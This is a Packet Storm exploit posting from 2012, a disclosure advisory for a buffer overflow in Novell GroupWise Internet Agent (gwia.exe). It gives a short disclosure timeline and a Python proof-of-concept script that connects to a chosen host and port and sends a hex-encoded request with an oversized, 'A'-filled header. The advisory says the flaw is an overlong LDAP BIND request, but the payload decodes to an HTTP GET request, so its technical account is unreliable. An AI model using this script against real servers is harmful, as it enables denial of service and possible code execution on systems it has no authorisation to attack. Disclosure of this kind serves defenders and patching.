exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Novell Groupwise Internet Agent Overflow

Novell Groupwise Internet Agent Overflow
Posted Nov 14, 2012
Authored by Francis Provencher

An overflow error occurs in GroupWise Internet Agent (gwia.exe) when the LDAP service process receives an overly long BIND Request. Successful exploitation may allow execution of arbitrary code. Versions 8.0.2 HP3 and 2012 are affected. Proof of concept code included.

tags | exploit, overflow, arbitrary, proof of concept
SHA-256 | 98eedb4ebf1ead9211c4ee8e6803edef89885b9d7e3884dac106b273c25e0aa7

Novell Groupwise Internet Agent Overflow

Change Mirror Download
#####################################################################################

Application: Novell Groupwise

Platforms: Windows
Version: 8.0.2 HP3 and 2012

Secunia: SA50622

{PRL}: 2012-33
ZDI: ??
Novell TID: 5150711
Author: Francis Provencher (Protek Research Lab's)

Website: http://www.protekresearchlab.com/

Twitter: @ProtekResearch


#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) The Code


#####################################################################################

===============
1) Introduction
===============

Novell, Inc. is a global software and services company based in Waltham, Massachusetts. The company specializes in

enterprise operating systems, such as SUSE Linux Enterprise and Novell NetWare; identity, security, and systems
management solutions; and collaboration solutions, such as Novell Groupwise and Novell Pulse. Novell was instrumental
in making the Utah Valley a focus for technology and software development. Novell technology contributed to the
emergence of local area networks, which displaced the dominant mainframe computing model and changed computing
worldwide. Today, a primary focus of the company is on developing open source software for enterprise clients.

(http://en.wikipedia.org/wiki/Novell)

#####################################################################################

============================
2) Report Timeline
============================

2011-06-02 Vulnerability reported to ZDI
2012-09-14 Novell Publish a patch
2012-11-13 Publication of this advisory


#####################################################################################

============================
3) Technical details
============================
The vulnerability is caused due to an overflow error in GroupWise Internet Agent (gwia.exe)
when the LDAP service process an overly long BIND Request.
Successful exploitation may allow execution of arbitrary code.


#####################################################################################

===========
4) The Code
===========

#!/usr/bin/python

import sys,os,socket

if len(sys.argv) < 3:
print "Usage: host,port"
sys.exit(0)

host=sys.argv[1]
port=int(sys.argv[2])

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

sock.connect((host,port))

sock.send("\x47\x45\x54\x20\x2F\x20\x48\x54\x54\x50\x2F\x31\x2E\x30\x0D\x0A\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x4C\x65\x6E\x67\x74\x68\x3A\x20\x2D\x31\x0D\x0A\x45\x78\x70\x69\x72\x65\x73\x3A\x20\x4D\x6F\x6E\x2C\x20\x30\x32\x20\x4A\x75\x6E\x20\x31\x39\x38\x32\x20\x30\x30\x3A\x30\x30\x3A\x30\x30\x20\x47\x4D\x54\x0D\x0A\x46\x72\x6F\x6D\x3A\x20\x61\x61\x61\x61\x61\x40\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x2E\x63\x6F\x6D\x0D\x0A\x49\x66\x2D\x4D\x6F\x64\x69\x66\x69\x65\x64\x2D\x53\x69\x6E\x63\x65\x3A\x20\x4D\x6F\x6E\x2C\x20\x30\x32\x20\x4A\x75\x6E\x20\x31\x39\x38\x32\x20\x30\x30\x3A\x30\x30\x3A\x30\x30\x20\x47\x4D\x54\x0D\x0A\x4C\x61\x73\x74\x2D\x4D\x6F\x64\x69\x66\x69\x65\x64\x3A\x20\x4D\x6F\x6E\x2C\x20\x30\x32\x20\x4A\x75\x6E\x20\x31\x39\x38\x32\x20\x30\x30\x3A\x30\x30\x3A\x30\x30\x20\x47\x4D\x54\x0D\x0A\x52\x65\x66\x65\x72\x65\x72\x3A\x20\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x2E\x63\x6F\x6D\x2F\x0D\x0A\x55\x73\x65\x72\x2D\x41\x67\x65\x6E\x74\x3A\x20\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41

print "done!"

sock.close()


#####################################################################################
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close